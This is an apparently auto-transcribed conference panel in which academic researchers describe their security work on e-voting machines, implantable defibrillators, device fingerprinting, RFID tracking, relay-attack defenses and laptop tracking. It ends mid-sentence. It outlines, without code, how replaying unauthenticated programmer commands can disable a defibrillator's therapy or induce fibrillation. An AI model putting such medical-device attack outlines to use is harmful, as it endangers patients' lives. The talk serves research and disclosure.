 Okay, well, thank you very much. I appreciate all the attendance here for the panel and talk slash panel on hacking in the name of science. Science are hacking. Which is better? Which is more important? Or can they work together? I don't know. To start off, a little bit about ourselves. Most of the people here on the panel are scientists and that means we get to do lots of crazy things and have a lot of fun. Just so you can kind of attach a name to a face. My name is Yoshi. We have Alexi at the very end. We have Dan Halpern right here in the middle. Carl, who is at the end also. And Mike Piotek. And then to provide the complimentary perspective, one of the things we really believe is that scientists shouldn't be working in isolation. We really do need to be understanding what's going on in the real world. There's a lot of need and opportunity for some complimentary work between academics and scientists and everyone here in this audience. And to help provide that perspective is John Callis. He's the co-founder and CTO of PGP and a real internet guru. So I'm glad he's able to join us. So what kind of things do scientists actually do? Well, when I was in grad school, I spent a lot of time breaking and trying to fix cryptographic protocols. One of them, which was SSH, which I think everyone here probably knows about. And so like any good talk, let's start with some definitions. Let X and Y are strings. Then bars around X that knows the length of X in bits and X double bar Y could also be concatenation. Okay, so this is actually meant as a joke. And the reason it's a joke, or the main point of this is that there's a lots of aspects of computer security that we're not gonna be talking about today. So I'm assuming most people in the audience here aren't interested in understanding how to do proofs of security for cryptographic protocols and mathematically analyze them. Instead, some of the work we've done is we've done some of the original hacking on electronic voting machines. This is a D-bolt voting machine from 2003. You're welcome. We've recently worked on analyzing and experimentally evaluating the security and privacy properties of real implantable medical devices like implantable defibrillators. We've shown that it's possible to frame printers for a copyright infringement and actually get DMCA takedown notices sent to these printers. We've analyzed the privacy properties of an IKI PodSport kit and we've done things like looked at streaming, multimedia streaming, encrypted video and saying, well, you know what? Even though this stream is encrypted, we can do traffic analysis and figure out what you're watching on the TV or whatnot. We've also created at the University of Washington, we've created this ubiquitous environment that's with RFID readers all throughout the building that's able to track all the students at the University of Washington in the computer science department. There are interesting issues that arise here and Carl is gonna be talking about that. Yeah, well, real good questions. Why are we actually doing that? And we're gonna try to answer these questions because as you know, what we're hoping to do is provide you a glimpse into what we do in academic security research and hopefully get your feedback. We recently did some open source laptop tracking software, new defenses against ghost and leech attacks and RFID skimming. I'm gonna talk about some of these later. But I think the big question is why do we actually do all these things? And the truth is that we love to hack. We like to break things, we like to build things and hopefully what we're doing will be able to better society, provide better technology to the people around us and we love to overcome challenges. And so if you go through this list, I'm guessing you're probably thinking that these are exactly the things that I like to do as well. So in some sense, we are all very similar and I believe that's the case but I wanted to provide you a perspective of how we approach things that might be slightly different from the academic perspective. So the first thing is that the science really influences our choice of problems. So lots of times when we're sitting in the lab we realize this would be some great neat thing to break. You know, this is a new RFID tag, this smart card, this cell phone application would be a great thing to break but some of those things we actually don't end up doing because there's not the kernel of science in there for the academic rigor. And so what we really try to do is we try to invent new techniques and discover new things and also we have a lot of interest in trying to actually, how do you experimentally evaluate the efficacy of our work? And also one thing to keep in mind is that before, during and after our technical work, one of the things that we're always thinking about in the back of our head is how can we actually publish this work in a peer-reviewed venue? Again, I want to stress that our work only represents a subset of the work done in the academic community. One thing about our goal is that we're really not here to compete with all the people here and what's being done in industry but hopefully to complement it. We try to seek out new problems and that's why we sought out electronic voting machines in 2003 and that's why we're seeking out medical devices now and also, you know, to apply new twists to the classic or old problems like trying to frame a printer for DMC takedown notices. So again, why do we make this talk? And this talk actually started when John Callis and I were at another meeting and seeing that, you know, the academic security community is doing a lot of great things. The DEF CON community, the industry is doing a lot of great things but the whole could be much greater than the sum of the parts. And so for you what we're hoping this will do is to provide a glimpse of the world of academic security research and of course I'd also like to encourage you if you really aren't interested in this to come to our academic security conferences like using security and maybe even write some of your own academic security papers. And of course we'd love to talk with you more later in this panel session and also afterwards. For us, we really hope to get your feedback and how can we work better with you? And for all of us we think that this kind of, you know, strengthening the bonds or this super highway between academics and non-academics will actually, it might take a long process but hopefully many of the great things will come of this. So let's talk a little bit about some of the hacks we've done. We're gonna try to go through these in moderate speed because we really do want to leave as much time as possible for questions at the end. For background, we are gonna talk about some of the attacks that we've done because we know the most about them. And we'll actually provide links to the papers themselves in the slides later which we'll also put online so you can actually read for them these academic papers and see what they, what structure are and what they look like especially if you're interested in doing some yourself. So the first type, we're gonna, there's several, I tried to categorize the types of academic security research we do into various different bins. And the first big bin that we try to focus on is analyzing critical systems. And these are systems that I define as being somehow important to society. Oftentimes we try to find critical systems that have been previously understudied or at least understudied in the public. You know, obviously the three letter agencies might have looked at these systems in a lot more detail but systems that haven't been publicly studied before. And one of the other aspects of our research is that when we do these papers we really need to not just break them but we have to try to, again, extract the science from that. And so we try to really focus on what are the lessons we learn from these attacks? How can we defend against these attacks and what are the bigger picture implications, the societal implications of the attacks we've uncovered. And if a paper is just focusing on attacks only then very often they don't actually, very hard to get accepted to a peer reviewed venue. By the way, since this is hoping to have some sort of interaction please do feel free to interrupt me later as we go through on the talk. So the first work I'm gonna talk about was our analysis of an electronic voting machine and we did this with some folks at Johns Hopkins and Rice University. So if you're not from this country or haven't been paying attention to the news for the past two centuries you might not know that voting is actually a cornerstone of our democracy. It allows us to influence many things from like crime, crime prevention, healthcare education, foreign policy, and what not. And in fact US citizens have fought very long and hard for the right to vote beginning with the Declaration of Independence in 1776 moving on to the 15th and 19th amendments and then poll tactics becoming illegal in 66. So now we fast forward to the 2000 presidential election. You probably all remember this, the buckle that happened in Florida were the hanging chads and the butterfly ballots and countless hours were being spent looking at these ballots trying to figure out who actually voted for whom. And in response to this there was a big push towards modernizing our voting machines or modernizing our elections and a big push towards electronic voting machines. So if we look at the state of the world prior to 2003 there were some computer scientists concerned about the security and privacy properties of these voting machines but it was actually very hard for them to analyze these systems and argue concretely. And so their concerns are often ignored by politicians and others. But then something magical happened in 2003 when the D-Bolt source code was, I'm sorry, we've had problems with the VGA monitor so I know this is kind of hard to read but the D-Bolt source code was found by Bev Harris on D-Bolt's anonymous FTP site and was reposted to the web and provided the first opportunity for the public to analyze the security and privacy of a real electronic voting machine. And so we found this and being scientists we were, that's provided an opportunity the first thing we did is we jumped on it. And so we analyze this system. For those of you who aren't familiar with how the system works, here's a brief overview and we did this through the reverse engineering of the system. Here's the electronic voting machine. Before the election the poll worker comes in and loads what's called the ballot definition file on the machine. This controls how the machine is, how the ballot is presented to the voter when they come up to the machine, who the candidates are, what the different piece parts of the election are. And then the voter shows up and the poll worker gives the voter a smart card and the smart card will allow the voter to actually vote, interactively vote. And at the end of the, and when the voter is finished selecting Mickey Mouse or Donald Duck, the voter is actually encrypted and written to some sort of storage. And at the end of the day the votes are transmitted to some back-end tabulation center. So this is how the system works and for most people this sounds all well and good. You know, this sounds a great voting system that will improve our democracy, overcome all the challenges that happen with the 2000 presidential election in Florida. It turns out it's not so simple. So of course an attacker could modify the software running on these voting machines. So, but for the purposes of the rest of this little piece, let's assume that the software running on these machines is exactly what we studied. And see what might go wrong. So in the software we studied we found that the ballot definition file wasn't authenticated in any way. And this means that a bad person could replace this ballot definition file with one that would swap votes. And so when a user went up and selected, you know, I want to vote for Mickey Mouse, the vote was actually recorded for Donald Duck and vice versa. And of course that could be used to modify the results of the election. We found that there was also no authentication between the smart card and the voting terminal. So the malicious voter could manufacture their own smart cards and vote multiple times. We found that the, sorry, this thing is not keeping up to date, vote multiple times. We also found that the, we know I mentioned that when you actually record your vote it's supposed to be encrypted and sort of this compact flash card. It turns out the encryption was done with a hard coded key. In fact the same key has been used since at least 1998 and probably before that. And what this means is that if the poll workers malicious they can just take these encrypted votes and just decrypt them and figure out who voted for whom. But actually some other interesting issues we found is that remember I mentioned that at the end of the day the votes are actually sent to a tabulation authority. And this machine had the ability to send these votes over a wireless, over an internet connection, a dial up connection or you know, you can manually carry these, you know, the physical media. But it turns out that if the votes are being sent over a wireless connection what the machine would do is it would take the votes, it would decrypt them and then send them in clear text over the internet connection to the tabulation center. And so, you know, clearly, oops, so clearly that's, you know, a bit undesirable. You know, we often, you know, we spend, like I said, we spend a lot of time looking at the source code. We found some interesting comments in there like this is a bit of a hack for now. This one is particularly confusing because I'm not actually sure what it means for key handling to be gorped. The bull beep flag is a hack so it doesn't beep twice. This is a result of the key handling being gorped. This doesn't really, you know, give me much confidence in the system if the other things weren't enough. You know, other gross hacks and double faults. I don't know if they were playing tennis while they were coding this or not. I don't know. You know, these are things that probably many of you who are doing security in industry have already seen. People say many comments you receive or like the correctness of the software has been proven through an extensive testing process. How many people in here believe that? Or how many people do not believe that? Yeah. And these other comments we've often received are these machines have never been attacked in the past and so we know that they won't be attacked in the future. Not having security mechanisms built into the software is okay since election procedures would detect any malicious activity. And of course people said the code we analyzed was old and so none of our results actually apply anymore. If you've been following the media since 2003 you know that this is actually not the case. There are the large number of subsequent results after ours that basically confirmed our findings. Some of them actually implemented the attacks we found and of course there have been many, many more results analyzing more recent versions of the systems. Great work from the Princeton team, the California top to bottom review, the Everest team and others. And so one of the things that academics do when they analyze these systems is we don't just say okay we've analyzed them, we've found lots of problems, what can we, you know, this is great, let's move on to the next topic, but there's a lot of follow through that needs to happen. And so there's now actually a whole research community focused on improving the security of electronic voting machines. They're focusing or improving electronic voting machines in general. I'm facing this way because the mic is kind of, you know, odd location. Proving the usability, you know, proving all aspects of the electronic voting machines is actually a new workshop that just ended last week or two weeks ago focusing on electronic voting technologies. Some slides, these slides are actually very derived from slides presented by Deborah Bowen, the Secretary of State of California at the Usenek Security Workshop. The first of which said, you know, prevent unwanted presidencies, Americans must bring back hand counted paper ballots. You've probably heard that many computer scientists are saying in the short term, since we have all these security problems, we really need paper ballots. And this is actually the bumper sticker that she displayed. She saw, the next slide is actually the bumper sticker that she saw or someone else saw on a real car in Texas. And you know, maybe you'll see this bumper sticker here at DEF CON next year. And with that, Alexi will be talking about, oh sorry, with that Dan will be talking about our security analysis of another what we believe to be critical system. So hi, I'm Dan, and I'm going to be talking about a paper we presented at Oakland security conference earlier this year about pacemakers and implantable cardiac defibrillators. This is joint work with a bunch of colleagues in Massachusetts at Unimass Amherst, and also a cardiologist and FDA-involved doctor named Dr. Meisel who's from Harvard Medical School. Okay, so, wow. So this talks about implantable medical devices. So I wanted to give you a few examples of implantable medical devices. So a drug pump, implantable drug pump would be used to treat chronic conditions. So people that have diabetes might have an insulin pump implanted to prevent them from having to deliver shots to themselves all the time, or morphine pump for people with chronic pain, prosthetic limbs, you know what those do. Neurostimulators are used to deliver shocks to the brain to prevent conditions like Parkinson's. They've actually been remarkably effective in causing huge life-changing effects for victims of these diseases. And then of course there's cardiac devices like pacemakers and implantable cardiac defibrillators, which we'll be talking about in this talk. So some facts about these devices, which I'm going to start calling IMDs for short, is that they're very common. So one statistic is that there were 2.6 million pacemakers implanted between 1990 and 2002 in the US alone. That's about 200,000 a year. These devices are computers. They have very sophisticated functionality and they perform vital life-stating functions inside of people. And in performing their functionality, they provide dramatic quality of life improvements and sometimes just life improvements for the people that they treat. And one thing that's particularly interesting about these devices is that the modern versions of them are actually wirelessly programmable. So here's an instance of such a device. This is a wireless implantable vasectomy that is adjustable. So the quote from the founder of the team that developed this device says, it'll be like turning a TV on and off with remote control, except that thankfully, the remote will be locked away in your doctor's office to safeguard against any accidental pregnancy or potential misuse. Now I'm sure we all know that proprietary remote controls work perfectly. For instance, you could never, for instance, modify a TV remote to control trains. So in reality, this is not just a talk about implantable medical device security or implantable medical devices. It's a talk about implantable medical device security. So why would we study IMDs? Well, security and privacy is really critical for these devices and that in the medical domains, actually a brand new problem domain and as a consequence, there are new challenges and new opportunities. On the other hand, experience, for example, with e-voting as Yoshi talked about, really seems to imply that the medical industry alone isn't gonna develop the right solutions and they need our help to do the right thing. And one of the things I'd like to underscore here is that securing IMDs is actually a really hard problem. So the devices that we looked at are implantable cardiac defibrillators or ICDs. These devices are very similar to pacemakers. They monitor your heart waveforms and they can set the heart rhythm for a heart that normally beats irregularly. They also have one more effect which is that they can treat fibrillation when the heart enters an unstable, kind of fluttering state but it's a potentially fatal heart condition and so it can deliver a large shock to re-synchronize the heart in these cases. So how do you actually implant these things? Well, what happens is the first thing is while the pacemaker's still out of the body, the doctor's gonna set the patient info on the device and to do this, he uses something called a device programmer. This is what's pictured here. Then the doctor will surgically implant the device but once the device has actually been put into place, the doctor needs to know that it's working. So think about this for a minute. How are you gonna test something that's designed to help a patient recover from potentially fatal heart conditions? Well, you do the obvious thing which is you actually have to be able to cause a fatal heart condition. So what the doctor does is the doctor will configure the device to provide the proper treatment and then he will actually invoke a test mode on the ICD itself that can put the heart into fibrillation and hopefully the device will respond. And in this case, doctors are standing by with the appropriate defibrillation equipment in case the device doesn't work. After this, the patient can leave, they can go home and at home, there's often ongoing monitoring. So these devices will talk wirelessly to some monitor sitting in the corner of the room which will then upload data over the internet or via dial-up connection. Typically, the security of those is outside the scope of this work. And the point is that this actually provides kind of continual diagnosis of the patients for the doctor without having to make office vids, that kind of thing. So this is really convenient for the patient. So if you start thinking about how are you gonna attack this system, what would be the first thing you do? Well, you might think about stealing a device programmer. And so you could be an insider at the hospital, you could be a doctor or a nurse that just has access to these things. You could steal one, maybe you could buy one. Those of you with laptops might wanna check eBay and see if there's anything out there you can get right now. And once they have one of these devices, the thief can reverse engineer the device, it can modify it. And what we found is that actually the ICD will trust any device that speaks the protocol. There's no cryptographic key material or authentication used in securing these communications. So the risk here is that you get root on basically every end plan if you have one of these devices. The ICD trust base is way too large. On the other hand, these things are pretty large and clunky, you have to carry them around. Maybe what you should do is actually build one of your own. And this is what we did. So we used the USRP software radio, it's pretty cheap. We ended up with maybe a thousand more dollars worth of hardware to build this thing. And we can actually mimic the behavior of the legitimate programmer with this ICD and it's in a much smaller form factor. So this is pretty nice. So what kinds of things can you do? Well, you can easily drop private information. So here is a printout of a trace of what kind of data is sent in the clear by these devices during normal communications. So you see things like the diagnosis of the patient, this is the patient history, this is the reason why they have the ICD. You see the hospital that they were implanted at, you see the doctor and his contact information. And there's a whole bunch of other things you learn, such as the current device state, the patient name, the date of birth, make and model, the serial number, things like that, whole bunch more. So not only can you eavesdrop on information stored inside the device, the device actually spits out a continuous EKG when it's in communications mode. So you can actually just sniff the patient's vital signs while it's active. Now there may not be an obvious fatal attack from this, but vital signs can still say a lot about a person and can be used for all kinds of interesting side channel information about the patient. So then we thought, okay, well, so we can eavesdrop, we can learn a lot of information from these devices, but we can also do a bunch of simple replay attacks. So it turns out that when the programmer and the pacemaker talk, the conversation is the same every time for the same operation. What this means is that we can do actually def attacks where all we do is retransmit the same commands as the programmer would and we can realize the same effect. Now some caveats here, the risk to patients today is extremely small. These devices only work at very close range. We only tested one ICD model and we didn't make any efforts to maximize the range to speed up the attack and currently it takes seconds to minutes to actually perform these attacks. But the kinds of things you can do are, you can drain the device battery, you can disable all therapies quietly without the patient knowing. Normally there'd be a warning if you as a doctor use the programmer to do this. And then of course, if you remember that test mode we talked about earlier, you can actually induce that test mode which now that you disable the therapies, the implant will ignore. You can think about how this works. In other kinds of implants, you can do things like flood the patient with drugs, overstimulate nerves, April Fools, you're pregnant. And the point is that these kinds of attacks can put patient safety and well-being at risk. And so just to drive home the point that yes, we think that right now these attacks are mostly academic and would be really hard to mount. The idea of attacks in medical systems are not new. So you may remember that in November of last year, people started posting animated pictures on web forums that were designed to cause epilepsy in epileptic viewers with light-sensitive epilepsy. And so this actually happened in 2007 and one of the site administrators says, look, this is just a bunch of very immature people delighting in their attempts to cause people misery. Attacking is just a way to pass the time for them. So what this means is that these attacks can happen. Not only that, but this same attack happened again in March of this year. So the take home there is that bad people do exist. These systems are getting really complicated. They're getting really powerful. They're doing a great lot of good. And so we need to really make sure they're secure now before the ability to mount attacks becomes even easier. I think that epilepsy is kind of a good indicator of what's down the road because these epilepsy patients have a very large attack surface. Right now, for most implantable, the attack surface is very small and that's why we want to get started on this problem now. So now Yoshi's going to talk about the next class of attacks we worked on. Thank you. So thank you, Dan. So just to summarize, from the voting work that we did five years ago and from the medical device work we're doing now, the reason we're focusing on it as academics is because we're really trying to say what is technology going to be like in five or 10 years and what new security and privacy issues are going to arise with those. And so we're really trying to solve tomorrow's problems with that type of work and address tomorrow's problems rather than today's problems. So you can think about these medical devices, as Dan mentioned, that are evolving amazingly fast. And so if the future devices in 10 or 15 years have the same security and privacy properties that these devices do, you can only imagine what the risks might be. I might also mention just some things for you to think about is that sometimes the patients themselves may be their adversaries. So Dan already mentioned the sanctumies which you can think about an implanted morphine pump and who might want to attack that. Okay, but in any case, let's move on to the next class of attacks. And I think this is probably something many of you in the audience are also familiar with. And as you're discovering some kind of new exploit or some new way of attacking a system. Well, when academics discover a new way of attacking a system, one thing we try to do is really push it as far as we can, and I'm not saying you don't do it as well, I'm just trying to describe the academic perspective, push it as far as we can in terms of measuring the efficacy of this attack. How many, what's the vulnerable population like? And basically how does this attack really work and what can we do to make it even better or and then also of course how to defend against it? And to kind of make this discussion a little concrete, I want to talk about some work we did on remote physical device fingerprinting. So here are the goals of that someone might want to have is to distinguish between two devices that have the same hardware and software configuration. You might be sniffing network traffic or you might be actively communicating with these two devices. And you want to know, are these the same devices? Are they different devices? Or maybe your question is, is this a real machine? I'm no remotely talking to a real machine, I don't have actually access to it yet, but I want to know if this is a real machine or not. Or maybe I have a collection of network traces that someone's posted online and they've anonymized, they can ID anonymize it. Prior to our work, there were a number of existing tools that one might use, for example, operating system fingerprinting, I'm looking at usage characteristics actually compromising the device, well, for some model, some threat models, compromise the device and try to then, you know, figure out what it is or put some malware or cookies on the device. And for our research, we've discovered a new technique which we call remote physical device fingerprinting that works on some information leakage between the TCP and ICMP protocols. So here's a little screenshot of a TCP dump. Those of you probably already know that there's three packet headers in here. The fields that we're most interested in are the TCP timestamps options field. And this field is defined as, from the RFC, the timestamp value to be sent in each outgoing packet is to be obtained from a virtual clock that we call the timestamp clock. And its value must be at least approximately proportional to real time. And so that's this field here. And if we highlight in green also, the field of the time of the recorder, the time that the recorder thinks it is when it captures this packet. Now as many of you know, there's clocks to you in these processors and so some computers might think they're a little bit faster than others and some might think it's a little bit slower. And it turns out that we can use the deviation in a machine's TCP timestamps clock over time. From, look at how the TCP timestamps option clock and some network packets that you've captured vary over time in relation to your time you can fingerprint these machines with some very small probability. So here's a screenshot of an example where we just collected packets from 64 different machines, or 69 machines in an undergraduate laboratory, all with the same hardware and software configuration. And then we plotted basically the difference in their reported time versus our reported time as a function of time on the horizontal axis. And as you can clearly see, some machines are very easily distinguishable from the others. And so we thought this was a kind of a neat observation. You know, this clearly it's not going to be able to uniquely fingerprint every single machine out there, but still it could be combined with other techniques for additional information. But what made this an academic study is that we had to actually dive, we wanted to really dive deeper into this and say, you know, what operating systems does this apply to? You know, how stable are these measurements actually over time, you know, over days? You know, how stable are these measurements for the same laptops that's being connected from different locations throughout the U.S. through different access technologies? Is this variant upon the topology between the measure and the devices being measured? And we had to do all these studies in the whole bunch of experiments in order to try to really understand how effective this technique was. And if you want to see how, and if you're doing this type of research yourself, in terms of, you know, finding new attacks and wanting to understand and maybe wanting to publish it at a computer security venue, or sorry, an academic venue, then you know, this paper, and there's also plenty of other good papers out there to look at. And then again, just some simple applications of this. You know, with some very small probability, we can track individual machines as they connect to different points along the internet. We use this to de-anonymize anonymous network traces that were being made available to other researchers. And you know, we actually use this also to distinguish between two virtual machines running on the same physical machine versus two different real machines. Some interesting observations that you get, of course, I'm sure there's people here have also gotten similar things. You know, when you publish this type of work, you get lots of emails. We receive lots of emails from people saying they've lost our laptops, can you help them find it? Turns out this technique wasn't quite designed for that unless we actually instrument the ISPs to do this type of monitoring, and even then, we wouldn't have low probability. But I'm actually showing these slides for a reason, and I'll get back to that in a minute. But with that, I want to actually talk about the next type of research we do in academic computer security, at least at the University of Washington, and it's on building new systems. And of course, we try to build new systems, and then, of course, evaluate those systems for solving both new and old problems. And also, one of the things we really try to do is we try to build systems that we think might exist in 10 or 15 years that don't actually address the security and privacy properties that we'd want, and then we try to retrofit them and see, well, how would we address these security and privacy properties so that we can better anticipate and guard against privacy invasions, security invasions in the future? So with that, I want to introduce Carl, who's going to talk about some work on the, what's called RFID ecosystem. All right, thanks, Yoshi. So today I'm going to talk about privacy and the RFID ecosystem at the University of Washington. There's a ton of people, I couldn't fit all their names on this slide, there's like 27 other collaborators. So the RFID landscape today consists of proximity cards, credit cards, toll transponders, supply chain applications where you have tags on pallets of items and passports. And there's some other niche applications like a cattle tagging, stuff like that. But what's projected to happen in the future is that we'll have tags on absolutely everything, your clothes, possibly money, everything you carry around with you. And so what we want to look at is, okay, so assume that RFID will become pervasive. So before that happens, we want to figure out both what cool applications does this pervasive technology enable, and also what are the privacy and security issues that arise. And there's an important privacy utility trade-off here. So we need to look at databases, applications, and so forth to see if RFID can actually be useful. But for this talk, I'm only going to talk about the privacy and security issues. So next I'm going to have a short video of a potential future of RFID that we want to work hard to avoid. So this is a video. Oh, let's see here. How do I activate this? It should actually be already activated. You just don't see it on this. Oh, I don't see it, okay. Ha ha, cool. All right. So what we're doing here is, we're doing a demo of tracking a student around the building. We have a Google map interface showing his exact position in the building. We have a bunch of RFID antennas on top of the cable tray there. It's sort of hard to see, but there's a purple icon that keeps moving around the map there. So we have 185 plus antennas deployed in the building. We have 40 plus readers. They cover all the floors. We're deploying more. This is different than cell phones in that anyone can track these tags, not just the carriers or people who have access to the carriers. So what I'm showing here is actually for demo purposes only, the actual study respects people's privacies. We have a huge informed consent process that's been reviewed by the human subjects board and stuff like that. But what I'm just showing here is how feasible it is to quickly track a person and he's coming back over here by the security lab. Read the next reader and let's see. Oh, there he is at the door coming in. So it's clear that violating your privacy is easy. Now here's the hard part. How do we fix that? So there are many privacy issues that are involved. There's institutional surveillance. There's rogue surveillance. Even if you fix the surveillance problems and you say who you want to be able to read your tags, you have the problem of setting access controls right. You can still game the system in certain cases and then we have found some unintended consequences of privacy controls. So the first is institutional surveillance which is pretty much what I just showed there and that whoever owns the RFID infrastructure can basically track anything that goes through it. And so some might wonder, well, is this a real threat? Well, we found this article in newspaper recently about worker snooping on customer data is pretty common. There's a lot of interest in companies and tracking customers with their cell phones. There's a company that's using the software radios to track people through malls with their cell phone transmissions. There's customer loyalty cards and so forth. And then there's this. So companies are also interested in finding out what their employees are doing and if you have an RFID employee badge, it seems feasible in the future that they can figure out exactly where you are. And then there's rogue surveillance. So the industry's rallying behind a common protocol, EPC Gen2. The Class 1 Gen2 tags have essentially no security features. Anyone with a Gen2 reader can read a tag potentially from far away. Down one of those hallways, we've actually placed an antenna, held a tag out at the other end. We got to 160 feet and then we hit the window and couldn't go any further. And that was with using completely commercial off-the-shelf readers and antennas. We didn't jack the power beyond legal limits or anything. And the other interesting thing is that Washington has now been deploying this enhanced driver's license that's completely optional to facilitate border crossing into Canada. That also uses an EPC Gen2 tag. I put one in my wallet. I walked down the hallway and I could easily track myself and anyone else who I give access to that data. So speaking of how I give people access to that data, it's really hard to get access control policies right. It's time consuming for even experts. One of the things that we're thinking about doing is reusing existing social networks. We have a Facebook application that one of the undergrads is developing. And the other thing where we've been thinking about is what a usable default should be. So one of the things that we've experimented with is something called physical access control. And the idea is that you have access to the tag reads that you could have physically seen. So the advantage here is that it's simple for people to think about a simple mental model. It's a very restrictive access, level of access while still being usable. Of course it has some issues like it assumes 360 degree vision. You can potentially read tags through walls. And there's a few problems with it. One, the way that we tell where you are is that you have a person tag. I am tagged right now. We have me, EPC Gen 2 RFID tag. Now there's no reason why I have to keep this with me. I could, for example, put it in the break room and see whenever someone enters the break room. There is no reason why you can't clone it. And in fact, there's no reason why I can't take someone's item, put it in here, slip it into their bag. And now I can track exactly where they go. And these tags can be very easy to hide. And big challenge is to try to figure out how we can mitigate that attack while still keeping the system usable. And even if we get some of these issues resolved, there's still some unintended consequences. So one of the undergrad projects we had running is a friend finder application. And one of the privacy models we explored there was what if you were notified when someone queried for your location? Well, this now tells you personal information about the querier because they may not want you to know that you've been asking for your location. And this actually turned out to have an interesting side effect. So there was a group of three girls who implemented this. One of them didn't have her location query by one of the other group members that often. And she felt, I don't know, somewhat betrayed or, I don't know, it was a weird social dynamic there. So there's some unintended consequences there. And on the RFID subject, I'm gonna turn it over to Alexi who will be talking about another project I worked on. He'll tell you more about that. Hi everyone, I am Alexi. Be talking to you about secret handshakes. But not in the standard way that you think. So like Carl said, RFIDs are everywhere, right? They're in credit cards, they're in, so you can get your burger faster, right? They're in access control cards, like this HID prox card. And what does this mean? Well, that means we get cool new attacks that we can try out. So there's lots of them, like skimming attacks, right? When you get next to someone and just copy their card and so on and so forth. But one of the more sinister attacks that people are talking about nowadays is called this ghost leech attack. And basically, you should scenario for these cards is like on the order of four inches, right? You come next to the reader, you pull your wallet out, you stick it next to the reader that said it authenticates, they complete your purchase and so on and so forth. So with this attack, what happens is you actually extend that authentication distance, potentially very long distance by having one guy next to the card, like for example, if you're in a cafe, right? He can be sitting next to you and can have his buddy next to some secret door that you have access to. And they can just proxy the communication between the tag and the door. So this works really well because they don't even have to look at any kind of fancy crypto that's implemented, they just forward it back and forth. Okay, so we're in science, so we want to try to defend against this, right? Yeah, science. So we want to try not to change the usage model, right? Because that'd be pretty annoying if I had to actually take my card out of my wallet every single time I want to do something. We want to modify just the tags. We want to, we want to continue using just complete passive tags, so ones without a battery. And we don't want to change the backend systems because that would really suck if we have to replace all the readers and all the infrastructure that's behind it. So how would you go about doing this? Well, you make the fundamental observation that this attack only works because the tag is promiscuous, right? It replies anytime it's being queried by a reader, irrespective of whether the user wants it to or not. So what if we make this observation? The fact that the motion that you make with the tag is different when you try to authenticate as opposed to when it's just sitting in your pocket and you're doing everyday things. So what if we can make the card smart and actually recognize this gesture? If we can do that, then we can limit the transmission to only the context in which the card would actually be doing something legitimate, like authenticating, okay? So it turns out that people authenticate in different ways, right? Somebody can slap their card against the reader, other people do a wave, other people can do like a little hip swing. Dan here says he actually jumps at the reader because it's not waist high so he doesn't want these. Anyway, so we decided to maybe try to standardize this a little bit and call it secret handshakes. So for example, we can have specific predefined gestures like here you see the 1.5 way, which is this. And the card can recognize this and be activated to do it. So does this really work? Well, apparently it does. So we tried three people, 150 tries, and it worked every single time. And then we also put the card in our pocket and did like random activities, like riding a bicycle, playing ping pong. It's always great when you can play ping pong and call it research. Smooths in the hallways, things like that. And it turned out to have zero false positives. So I mean, this is three hours, it's not like three years. So this is kind of preliminary, but still it works, pretty cool. So we're not the first to try to shield the card from transmitting. There's these sleeves, which apparently don't work too well if they have even a small opening. So they're supposed to shield your card from RF. You could also have a tinfoil hat for your wallet, stylish maybe. But that doesn't really maintain the same usage model because now you not only have to take your wallet out of your pocket, not only have to take the card out of your wallet, but also have to take the card out of the freaking shield. So anyway, this isn't very convenient. You can also put buttons on these things, right? Except buttons are prone to being pressed when they're in tight conditions like a wallet. So that's not good either. So here's kind of a little glimpse of how we did this. I'm not gonna tell you the details right now because we don't have that much time, but if you wanna meet up with me afterwards I can actually tell you some more. We used a completely passive 900 megahertz EPS Gen 1 RFID device from Intel. It's called a WISP, wireless identification sensing platform. Is that little chip you see in the middle of that black plastic case. The wires, all the wires except for the two yellow, big ones are debug wires. And basically what it does is it collects our rough power, stores that on a cap, and then it has a micro control on board. And when it has enough power it actually can actually do some computation, which is pretty cool. This one also has an accelerometer on it, but you can put other sensors on it as well like a capacitance sensor, a light sensor, things like that. So you can use this same technique to do other tricks. For example, we talked to Gal who was writing in a subway system somewhere in Europe. It's more advanced than here. Because you actually, yeah, you scan your card on the way in, contactless card, and you scan it on the way out at some other station and it charges you for the distance that you travel. So she had two cards in her wallet, and apparently one got charged on the way in, another one got charged on the way out, and she was stuck in the subway for a half hour trying to figure out what was going on until the police came. So what you can do now with this is you can have different handshakes for each different card. So like for one card you do a triangle, another one you do a square, another one you do the wave. We actually also thought about doing this wave. We called it TTB, which we called tap that butt. You could just kind of, and activate it. But this opens up some vulnerabilities. You can have people trying to, people become very eager to help you authenticate in those cases. So anyway, this is maybe vulnerable to a dancing ninja attack in which an attacker can actually coerce you to dance in some certain way. Wave your butt back and forth. But anyway, that's that. I'll hand it back off to Yoshi. Thanks. Well thank you, Alexi. I guess we want to make sure we avoid other people helping you authenticate. So this is another class of, another example of the types of research we want to do. Again, we're trying to identify problems in security problems and important systems, and then try to address them. One of the research projects, one of the other building type research projects we did was focusing on laptop tracking systems. So many of you probably know that laptop theft is a fairly big problem, and it's actually a fairly large number of companies focusing on providing services to help people protect against loss or stolen laptops. Now of course, an attacker could delete this software if it's installed in their machine. This software basically runs on their machine and uploads their location, implementation, information to a central server periodically or once every half hour, or something like that. A sophisticated adversary could remove the software, but many adversaries or many laptop thieves aren't actually that sophisticated. And so these software is actually quite effective in practice. But the question that we started asking ourselves is, as privacy advocates, do these existing laptop tracking systems compromise people's privacy? And this is an example of how this might be the case. This private information, this location information is going to laptop tracking company. And it turns out that location information for other types of systems has been used in the past, have been subpoenaed for easy past toll records have been subpoenaed and used in divorce cases. And so maybe laptop tracking data might also be used in such systems. Government or insiders, again, oftentimes try to, or sometimes try to compromise, use their extra access to compromise people's privacy. And another issue that we wish to address is that, well, if someone actually gets access to your laptop, would they be able to compromise the security and privacy properties of the laptop tracking software to actually figure out where all you've been in the past? Maybe as you're crossing the borders, what not? And so we actually invented some new cryptographic techniques that can provide laptop tracking services, but also preserve privacy. So here's the model and why it was somewhat interesting. What we wanted to do is we wanted to create a system that would allow us to use a third party to help us track our location, without that third party ever being able to actually learn our location. To solve this problem, we used some encryption. By basic encryption, things called Forest Secure, pseudo random bit generators, a little bit of identity-based encryption depending on some threat models, et cetera. But we really had to try to design these systems that way. We leveraged OpenDHT, and this is now an open source system. If you Google Adiona, which is named after the Roman goddess of safe returns, she's supposed to return children to their parents after they left for the first time. You'll see this. And of course, it's open source, so we of course encourage, love anyone to help us make it better. But in the interest of brevity, let me go on to the next aspect of the types of security research we do. And that's to measure what's actually happening in today's world. And so the idea here is that lots of things are happening. People are connecting to the internet all the time. Ads are out there. Spam is out there. Botanets are out there. And we really want to measure the scale of these attacks or these artifacts. And we want to do something sort of a scientific, rigorous way. And so one project 